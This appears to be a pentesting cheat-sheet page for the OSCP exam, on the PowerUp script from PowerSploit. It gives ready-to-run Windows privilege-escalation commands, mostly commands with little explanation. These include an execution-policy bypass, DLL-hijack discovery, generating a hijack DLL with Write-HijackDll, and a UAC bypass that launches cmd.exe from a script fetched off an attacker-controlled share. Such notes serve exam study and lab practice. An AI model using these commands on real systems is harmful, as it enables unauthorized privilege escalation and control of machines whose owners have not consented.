PowerUp

PowerUp is part of the PowerSploit and the PowerShell Empire Framework. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Officially allowed during the OSCP exam according to the OSCP Exam FAQ (part of PowerShell Empire, which is allowed).

Usage
DLL Hijacking
Invoke-WScriptBypassUAC.ps1
Reference

Usage

powershell -exec bypass
Import-Module .\PowerUp.ps1

Location on Kali Linux

Upload the PowerUp script to the victim machine. See File Transfer.

/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1

Execute all checks

Output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks | Out-String -Width 4096}"

Invoke-AllChecks | Out-String -Width 4096

Invoke-AllChecks -HTMLReport

DLL Hijacking

See DLL Hijacking.

Finds possible hijackable DLL locations in PATH

Finds all directories in the system %PATH% that are modifiable by the current user.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Find-PathDLLHijack

Finds DLL hijack locations for running processes

Finds possible hijackable DLL locations for all processes.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Find-ProcessDLLHijack | Out-String -Width 4096

Finds possible hijackable DLL locations for a specific process.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Get-Process "msedge" | Find-ProcessDLLHijack | Out-String -Width 4096 > results.txt

Generate a DLL file

Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]
 [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]

powershell -exec bypass
Import-Module .\PowerUp.ps1
Write-HijackDll -DllPath 'C:\Users\<somepath>\<somedll>.dll'

wlbsctrl.dll – see Phantom DLL Hijacking

powershell
Import-Module .\PowerUp.ps1
Write-HijackDll -DllPath 'C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Invoke-WScriptBypassUAC.ps1

Official Documentation.

Did not work (was not applicable to target tested).

cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1 /home/kali/share

copy \\x.x.x.x\myshare\Invoke-WScriptBypassUAC.ps1 Invoke-WScriptBypassUAC.ps1

powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# powershell.exe -exec bypass
.\Invoke-WScriptBypassUAC.ps1 -Command cmd.exe

Reference

PowerUp (PowerSploit on Read the Docs)
Documentation (GitHub)
Find-PathDLLHijack (PowerSploit on Read the Docs)
Find-ProcessDLLHijack (PowerSploit on Read the Docs)
Write-HijackDll (PowerSploit on Read the Docs)